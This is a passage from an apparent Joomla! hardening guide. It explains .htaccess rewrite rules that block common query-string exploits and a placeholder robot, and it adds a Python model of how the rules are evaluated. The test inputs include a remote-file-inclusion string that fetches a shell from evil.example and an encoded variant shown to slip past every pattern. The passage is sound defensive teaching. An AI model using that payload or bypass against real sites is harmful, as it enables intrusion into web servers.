.htaccess
.htaccess is a wonderful and powerful tool on which we'll spend a lot of time later, but for now, make sure you include the following code in yours. If you are not familiar with .htaccess, or if you have a default setup of Joomla!, you will see in the root directory a file called htaccess.txt. This file gives you the power to change several aspects of how Apache serves a directory, notably through the mod_rewrite directives. Here is the portion you should be running. It has been included in the base htaccess.txt file since Joomla! 1.0.11. Check yours to ensure that you are running this highly valuable security measure.
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
#IF the URI contains a "http:" or "ftp:" or "https"
RewriteCond %{QUERY_STRING} http\: [OR]
RewriteCond %{QUERY_STRING} ftp\: [OR]
RewriteCond %{QUERY_STRING} https\: [OR]
#OR if the URI contains a "["
RewriteCond %{QUERY_STRING} \[ [OR]
#OR if the URI contains a "]"
RewriteCond %{QUERY_STRING} \] [OR]
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
Append the code segment above to your .htaccess file, after the RewriteEngine On line that the Joomla! htaccess.txt already contains; without that line Apache ignores the rules. If you haven't done so, rename htaccess.txt to .htaccess so that Apache reads it at all. The rules also need mod_rewrite loaded and AllowOverride set to permit FileInfo for the directory; if either is missing, Apache answers every request with a 500 Internal Server Error rather than silently skipping the file, so test the site right after the change.
This .htaccess patch from the Joomla.org core team has proven its worth against a slew of common attacks. As you can read through, each RewriteCond tests the query string for a pattern typical of attacks on your site: a remote URL injected into a parameter, an attempt to set a mosConfig_ or GLOBALS value, a <script> tag, and so on. The last line in the block:
RewriteRule ^(.*)$ index.php [F,L]
refuses any request that satisfied one of the conditions with a 403 Forbidden response. The F flag makes Apache send the 403 outright, so the index.php substitution is never used (nothing is forwarded to the home page), and L stops further rule processing. Two caveats: the conditions are matched against the raw, still %-encoded query string, so they catch the encodings listed in the patterns and nothing cleverer, and a pattern such as http\: also rejects legitimate requests whose parameters happen to contain a URL. Treat the block as a first line of defence that complements keeping Joomla! and its extensions patched, not as a replacement for it.
Another useful addition to your .htaccess file is a set of rules to stop a specific robot, in our case "EvilRobot", from digging into the sensitive areas of your site:
# Both conditions must hold (no [OR] flag), so a forged User-Agent alone is not enough
RewriteCond %{HTTP_USER_AGENT} ^EvilRobot.*
RewriteCond %{REMOTE_ADDR} ^123\.45\.67\.[8-9]$
# In a per-directory .htaccess the path is matched relative to that directory, without a leading slash
RewriteRule ^kljiwlslci/secret/data/.+ - [F]
The addresses 123.45.67.8 and .9 and the directory name are placeholders; substitute the robot's real address range and the path you want to protect. The User-Agent header is trivially forged, which is why the address check is there as well.
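To see exactly how the RewriteCond chains in both blocks behave, the following script (an added example, not code from this book or from the Joomla! project) models mod_rewrite's condition evaluation in Python and runs the exploit block and the robot block against constructed requests. It assumes Python's re module is close enough to Apache's PCRE for these particular patterns and that mod_rewrite sees QUERY_STRING raw, without %-decoding; the query strings, the host evil.example and the address 123.45.67.x are constructed for the demonstration.

```python
"""Model mod_rewrite RewriteCond evaluation and run the page's two rule blocks
against constructed requests (added example, not Joomla! or Apache code)."""
import re
from typing import Dict, FrozenSet, List, NamedTuple


class Cond(NamedTuple):
    variable: str          # server variable, e.g. "QUERY_STRING"
    pattern: str           # regex exactly as written in .htaccess (Apache uses PCRE)
    negate: bool           # a leading "!" on the pattern inverts the match
    flags: FrozenSet[str]  # e.g. {"OR", "NC"}


def parse_conds(htaccess_text: str) -> List[Cond]:
    """Extract the RewriteCond lines from an .htaccess fragment.

    Handles only the syntax used on this page: a %{VAR} test string, a regex
    (optionally negated with "!") and an optional [flag,flag] list.  Comments
    and other directives (RewriteRule, RewriteEngine, ...) are skipped.
    """
    conds: List[Cond] = []
    for raw in htaccess_text.splitlines():
        parts = raw.split()
        if not parts or parts[0] != "RewriteCond":
            continue
        var, pattern = parts[1], parts[2]
        flags = frozenset(parts[3].strip("[]").split(",")) if len(parts) > 3 else frozenset()
        conds.append(Cond(var.strip("%{}"), pattern.lstrip("!"), pattern.startswith("!"), flags))
    return conds


def cond_matches(cond: Cond, env: Dict[str, str]) -> bool:
    """Evaluate a single RewriteCond against the request's server variables."""
    re_flags = re.IGNORECASE if "NC" in cond.flags else 0
    # Unanchored search, as in Apache: the pattern may match anywhere in the value.
    hit = re.search(cond.pattern, env.get(cond.variable, ""), re_flags) is not None
    return hit != cond.negate


def conds_pass(conds: List[Cond], env: Dict[str, str]) -> bool:
    """Combine conditions the way mod_rewrite does.

    A run of [OR]-flagged conditions together with the next condition that
    lacks [OR] forms one group.  A group passes if any member matches, and
    every group must pass before the RewriteRule that follows them fires.
    Conditions without [OR] are therefore ANDed, as in the robot example.
    """
    groups: List[List[Cond]] = []
    current: List[Cond] = []
    for cond in conds:
        current.append(cond)
        if "OR" not in cond.flags:
            groups.append(current)
            current = []
    if current:  # a trailing [OR] with nothing after it still closes the group
        groups.append(current)
    return all(any(cond_matches(c, env) for c in group) for group in groups)


# The conditions of the Joomla! block quoted above (comment lines dropped).
JOOMLA_EXPLOIT_BLOCK = r"""
RewriteCond %{QUERY_STRING} http\: [OR]
RewriteCond %{QUERY_STRING} ftp\: [OR]
RewriteCond %{QUERY_STRING} https\: [OR]
RewriteCond %{QUERY_STRING} \[ [OR]
RewriteCond %{QUERY_STRING} \] [OR]
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
"""

# The robot block; the address range and path are the page's placeholders.
ROBOT_BLOCK = r"""
RewriteCond %{HTTP_USER_AGENT} ^EvilRobot.*
RewriteCond %{REMOTE_ADDR} ^123\.45\.67\.[8-9]$
RewriteRule ^kljiwlslci/secret/data/.+ - [F]
"""


def query_blocked(query_string: str) -> bool:
    """True if the Joomla! block would answer this raw query string with 403."""
    return conds_pass(parse_conds(JOOMLA_EXPLOIT_BLOCK), {"QUERY_STRING": query_string})


def robot_blocked(user_agent: str, remote_addr: str) -> bool:
    """True if the robot block would refuse a request for the protected path."""
    env = {"HTTP_USER_AGENT": user_agent, "REMOTE_ADDR": remote_addr}
    return conds_pass(parse_conds(ROBOT_BLOCK), env)


if __name__ == "__main__":
    # Constructed query strings; mod_rewrite sees them raw, without %-decoding.
    for qs in [
        "option=com_content&task=view&id=1",                             # ordinary request
        "mosConfig_absolute_path=http://evil.example/shell.txt",        # classic RFI attempt
        "q=%3Cscript%3Ealert(1)%3C/script%3E",                          # encoded <script>
        "searchword=http://www.example.com/",                           # legitimate, yet blocked
        "mosConfig%5Fabsolute_path=%68ttp%3A//evil.example/shell.txt",  # evades every pattern
    ]:
        print("403" if query_blocked(qs) else "200", qs)
    print(robot_blocked("EvilRobot/1.0", "123.45.67.8"))   # both conditions hold
    print(robot_blocked("EvilRobot/1.0", "123.45.67.10"))  # address outside .8-.9
```

Running it shows the two limits noted above: a harmless search for a URL is rejected because of the http\: pattern, while a request that spells mosConfig_ as mosConfig%5F and http: as %68ttp%3A passes every condition even though PHP decodes both to the same parameter name and value. The robot block, having no [OR] flags, refuses the request only when the User-Agent and the client address both match.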
Note
To learn more about RewriteCond and RewriteRule, visit the following links available from apache.org:
http://httpd.apache.org/docs/2.2/rewrite/
http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html#rewriterule